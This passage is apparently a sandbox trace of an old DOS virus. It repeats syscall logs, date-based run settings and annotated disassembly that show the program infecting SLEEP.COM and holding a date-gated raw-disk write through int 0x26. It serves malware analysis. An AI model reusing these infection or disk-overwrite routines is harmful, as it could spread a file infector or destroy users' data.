0x12cb1: jb 0x12c63  ; carry set means the open failed; the error path is outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the handle-based calls that follow
0x12cba: mov ah, 0x40  ; INT 21h AH=40h: write; the window ends before the int, the trace logs the write at PC 12cc4
2018-12-25T12:45:14.853272582Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.870969517Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.87263022Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.87990288Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.882684168Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.885255192Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.888163237Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.889178738Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.890658531Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.896669751Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.898207094Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.89930589Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.904697746Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.911280577Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.913065543Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.917542702Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.921722165Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.923205003Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.930541031Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.931803799Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.936173481Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.93822199Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.940186482Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.941956172Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.942992896Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.944628582Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.951532364Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.95420303Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.956701368Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.965989619Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.980820206Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.98457376Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.991757219Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.99885588Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.001778248Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.013120357Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.015008155Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.022858836Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.025899437Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.028882768Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.032187754Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.034454066Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.037005767Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.047412691Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.04990334Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.051451074Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.060581882Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.071502115Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
; Window after the "Get date" call at PC 12b6f; its first instruction (cmp dx, 0x606) is on the trace row above.
; DOS returns the month in DH and the day in DL, so 0x0606 is 6 June; the run configurations on this page use 1 January.
; From 0x12b7b the linear sweep runs through bytes that are probably data, so those mnemonics are unreliable.
0x12b73: je 0x12b78  ; date matches: take the 0x12d28 path
0x12b75: jmp 0x12d94  ; otherwise continue at 0x12d94; the trace next logs calls at PC 12d9f and 12da6
0x12b78: jmp 0x12d28  ; date-triggered path, outside this window
0x12b7b: and ah, bh  ; not reachable by fall-through (follows an unconditional jmp); presumably data
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 then 8B EC would be push bp / mov bp, sp from 0x12b84, so the sweep looks misaligned
0x12b86: in al, dx  ; opcode EC, likely the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = bp - 0x2c, presumably the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 (directory bit)
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at offset 0x1b8; the window ends before the int
2018-12-25T12:45:15.07385451Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:15.078609696Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:15.221564544Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
; Window of 16-bit DOS code after the "Get date" call at PC 12a5a; its first instruction (cmp dl, 2) is on the trace row above.
; DOS returns the day of the month in DL, so the int 0x26 path below is gated on day 2; the run configurations on this page set Day to 1.
; NOTE(review): the syscall numbers in this trace match INT 21h AH values, so an int 0x26 may not be logged at all - confirm before reading its absence as "not executed".
0x12a5d: je 0x12a62  ; DL == 2: fall into the raw disk-write path
0x12a5f: jmp 0x12a80  ; any other day: straight to the ret
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; cdq and cwd share one opcode; in 16-bit code it executes as cwd (DX = sign extension of AX)
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count for int 0x26
0x12a69: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system (AL = drive, DX = first sector, DS:BX = buffer)
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc
0x12a74: mov dx, 0  ; DX = 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; 0x22a62 - 0x12a80 = 0xffe2, i.e. -0x1e as a signed 16-bit displacement: the real target is presumably 0x12a62 (the int 0x26 path)
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; the window ends here
2018-12-25T12:45:15.223788962Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:15.225739407Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:15.228363564Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:15.229595811Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:15.233503945Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.23808057Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:15.242305437Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
; Window of 16-bit DOS code after the "Get time" call; its first instruction (add dl, dh) is on the trace row above.
; Read with the trace: clear the target's attributes, close it, reopen it read/write, then begin writing.
; Analyst note: an attribute reset followed by a read/write reopen of an existing .COM file is a behavioural indicator of a file infector.
0x12c90: je 0x12c8a  ; DL + DH was zero: branch back (target is before this window), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; si = 0x115 + word stored at 0x106 (looks like a relocation delta; TODO confirm)
0x12c99: mov byte ptr [si], dl  ; store the time-derived byte; NOTE(review): possibly a per-copy key, its use is not shown here
0x12c9b: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0: no attributes, so read-only/hidden/system are cleared
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = si + 0xca, the path argument of the attribute call
0x12ca6: int 0x21  ; logged in the trace as "Get or set file attributes" (PC 12ca8)
0x12ca8: mov ah, 0x3e  ; INT 21h AH=3Eh: close the handle in BX
0x12caa: int 0x21  ; logged as "Close file" (PC 12cac)
0x12cac: mov ax, 0x3d02  ; INT 21h AH=3Dh, AL=02h: open for read/write
0x12caf: int 0x21  ; logged as "Open file" (PC 12cb1)
0x12cb1: jb 0x12c63  ; carry set means the open failed; the error path is outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the handle-based calls that follow
0x12cba: mov ah, 0x40  ; INT 21h AH=40h: write; the window ends before the int, the trace logs the write at PC 12cc4
2018-12-25T12:45:15.245049452Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:15.265603566Z 62 PC: 12cac | Close file
2018-12-25T12:45:15.267415913Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.280520072Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:15.288159353Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.290961163Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.294116682Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:15.295560245Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.29768033Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:15.307122163Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.309580691Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:15.311120662Z 62 PC: 12d11 | Close file
2018-12-25T12:45:15.319526999Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:15.326263144Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:15.328082933Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.332933199Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.337092095Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.338565794Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.345306081Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.347268357Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.355226415Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.35835342Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.361467113Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.36410499Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.365446862Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.368008827Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.377710277Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.37997609Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.382474773Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.391084332Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.40195529Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:15.405263798Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.412336266Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.419720942Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.422344315Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.433696007Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.435518786Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.443186287Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.446174607Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.449160886Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.453143461Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.454667086Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.457098353Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.466509034Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.469087518Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.470591812Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.479392091Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.490612582Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
; Window after the "Get date" call at PC 12b6f; its first instruction (cmp dx, 0x606) is on the trace row above.
; DOS returns the month in DH and the day in DL, so 0x0606 is 6 June; the run configurations on this page use 1 January.
; From 0x12b7b the linear sweep runs through bytes that are probably data, so those mnemonics are unreliable.
0x12b73: je 0x12b78  ; date matches: take the 0x12d28 path
0x12b75: jmp 0x12d94  ; otherwise continue at 0x12d94; the trace next logs calls at PC 12d9f and 12da6
0x12b78: jmp 0x12d28  ; date-triggered path, outside this window
0x12b7b: and ah, bh  ; not reachable by fall-through (follows an unconditional jmp); presumably data
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 then 8B EC would be push bp / mov bp, sp from 0x12b84, so the sweep looks misaligned
0x12b86: in al, dx  ; opcode EC, likely the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = bp - 0x2c, presumably the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 (directory bit)
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at offset 0x1b8; the window ends before the int
2018-12-25T12:45:15.492670784Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:15.496727112Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:15.741213745Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
; Window of 16-bit DOS code after the "Get date" call at PC 12a5a; its first instruction (cmp dl, 2) is on the trace row above.
; DOS returns the day of the month in DL, so the int 0x26 path below is gated on day 2; the run configurations on this page set Day to 1.
; NOTE(review): the syscall numbers in this trace match INT 21h AH values, so an int 0x26 may not be logged at all - confirm before reading its absence as "not executed".
0x12a5d: je 0x12a62  ; DL == 2: fall into the raw disk-write path
0x12a5f: jmp 0x12a80  ; any other day: straight to the ret
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; cdq and cwd share one opcode; in 16-bit code it executes as cwd (DX = sign extension of AX)
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count for int 0x26
0x12a69: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system (AL = drive, DX = first sector, DS:BX = buffer)
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc
0x12a74: mov dx, 0  ; DX = 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; 0x22a62 - 0x12a80 = 0xffe2, i.e. -0x1e as a signed 16-bit displacement: the real target is presumably 0x12a62 (the int 0x26 path)
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; the window ends here
2018-12-25T12:45:15.74412306Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:15.747316924Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:15.752360646Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:15.753621461Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:15.760360239Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.767303974Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:15.774219447Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
; Window of 16-bit DOS code after the "Get time" call; its first instruction (add dl, dh) is on the trace row above.
; Read with the trace: clear the target's attributes, close it, reopen it read/write, then begin writing.
; Analyst note: an attribute reset followed by a read/write reopen of an existing .COM file is a behavioural indicator of a file infector.
0x12c90: je 0x12c8a  ; DL + DH was zero: branch back (target is before this window), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; si = 0x115 + word stored at 0x106 (looks like a relocation delta; TODO confirm)
0x12c99: mov byte ptr [si], dl  ; store the time-derived byte; NOTE(review): possibly a per-copy key, its use is not shown here
0x12c9b: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0: no attributes, so read-only/hidden/system are cleared
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = si + 0xca, the path argument of the attribute call
0x12ca6: int 0x21  ; logged in the trace as "Get or set file attributes" (PC 12ca8)
0x12ca8: mov ah, 0x3e  ; INT 21h AH=3Eh: close the handle in BX
0x12caa: int 0x21  ; logged as "Close file" (PC 12cac)
0x12cac: mov ax, 0x3d02  ; INT 21h AH=3Dh, AL=02h: open for read/write
0x12caf: int 0x21  ; logged as "Open file" (PC 12cb1)
0x12cb1: jb 0x12c63  ; carry set means the open failed; the error path is outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the handle-based calls that follow
0x12cba: mov ah, 0x40  ; INT 21h AH=40h: write; the window ends before the int, the trace logs the write at PC 12cc4
2018-12-25T12:45:15.776688348Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:15.79345829Z 62 PC: 12cac | Close file
2018-12-25T12:45:15.795285903Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.803920367Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:15.806963004Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.80977741Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.812978908Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:15.814434864Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.816652787Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:15.826892015Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.8291482Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:15.830640193Z 62 PC: 12d11 | Close file
2018-12-25T12:45:15.839468365Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:15.845968986Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:15.847679129Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.853130078Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.857237733Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.858609264Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.865087519Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.866352647Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.873493859Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.877535759Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.879319465Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.881511891Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.88230439Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.884145509Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.889624403Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.890953644Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.89213118Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.897074452Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.903218857Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:15.90542828Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.909587885Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.913670586Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.91558346Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.926407966Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.928246883Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.941184364Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.948956768Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.95171297Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.955475755Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.956969551Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.959238232Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.969014853Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.971358137Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.972903495Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.981822016Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.992817848Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
; Window after the "Get date" call at PC 12b6f; its first instruction (cmp dx, 0x606) is on the trace row above.
; DOS returns the month in DH and the day in DL, so 0x0606 is 6 June; the run configurations on this page use 1 January.
; From 0x12b7b the linear sweep runs through bytes that are probably data, so those mnemonics are unreliable.
0x12b73: je 0x12b78  ; date matches: take the 0x12d28 path
0x12b75: jmp 0x12d94  ; otherwise continue at 0x12d94; the trace next logs calls at PC 12d9f and 12da6
0x12b78: jmp 0x12d28  ; date-triggered path, outside this window
0x12b7b: and ah, bh  ; not reachable by fall-through (follows an unconditional jmp); presumably data
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 then 8B EC would be push bp / mov bp, sp from 0x12b84, so the sweep looks misaligned
0x12b86: in al, dx  ; opcode EC, likely the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = bp - 0x2c, presumably the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 (directory bit)
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at offset 0x1b8; the window ends before the int
2018-12-25T12:45:15.995130946Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:15.999565324Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:16.558512938Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
; Window of 16-bit DOS code after the "Get date" call at PC 12a5a; its first instruction (cmp dl, 2) is on the trace row above.
; DOS returns the day of the month in DL, so the int 0x26 path below is gated on day 2; the run configurations on this page set Day to 1.
; NOTE(review): the syscall numbers in this trace match INT 21h AH values, so an int 0x26 may not be logged at all - confirm before reading its absence as "not executed".
0x12a5d: je 0x12a62  ; DL == 2: fall into the raw disk-write path
0x12a5f: jmp 0x12a80  ; any other day: straight to the ret
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; cdq and cwd share one opcode; in 16-bit code it executes as cwd (DX = sign extension of AX)
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count for int 0x26
0x12a69: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system (AL = drive, DX = first sector, DS:BX = buffer)
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc
0x12a74: mov dx, 0  ; DX = 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; 0x22a62 - 0x12a80 = 0xffe2, i.e. -0x1e as a signed 16-bit displacement: the real target is presumably 0x12a62 (the int 0x26 path)
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; the window ends here
2018-12-25T12:45:16.561387997Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:16.564076239Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:16.567891119Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:16.569531698Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:16.575383041Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:16.581687452Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:16.595249283Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
; Window of 16-bit DOS code after the "Get time" call; its first instruction (add dl, dh) is on the trace row above.
; Read with the trace: clear the target's attributes, close it, reopen it read/write, then begin writing.
; Analyst note: an attribute reset followed by a read/write reopen of an existing .COM file is a behavioural indicator of a file infector.
0x12c90: je 0x12c8a  ; DL + DH was zero: branch back (target is before this window), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; si = 0x115 + word stored at 0x106 (looks like a relocation delta; TODO confirm)
0x12c99: mov byte ptr [si], dl  ; store the time-derived byte; NOTE(review): possibly a per-copy key, its use is not shown here
0x12c9b: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0: no attributes, so read-only/hidden/system are cleared
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = si + 0xca, the path argument of the attribute call
0x12ca6: int 0x21  ; logged in the trace as "Get or set file attributes" (PC 12ca8)
0x12ca8: mov ah, 0x3e  ; INT 21h AH=3Eh: close the handle in BX
0x12caa: int 0x21  ; logged as "Close file" (PC 12cac)
0x12cac: mov ax, 0x3d02  ; INT 21h AH=3Dh, AL=02h: open for read/write
0x12caf: int 0x21  ; logged as "Open file" (PC 12cb1)
0x12cb1: jb 0x12c63  ; carry set means the open failed; the error path is outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the handle-based calls that follow
0x12cba: mov ah, 0x40  ; INT 21h AH=40h: write; the window ends before the int, the trace logs the write at PC 12cc4
2018-12-25T12:45:16.597374994Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:17.512209479Z 62 PC: 12cac | Close file
2018-12-25T12:45:17.514850051Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.529970437Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:17.536972349Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.539831754Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.543664618Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:17.544941002Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.547455325Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:17.558474778Z 42 PC: 12a5a | Get date (See above)
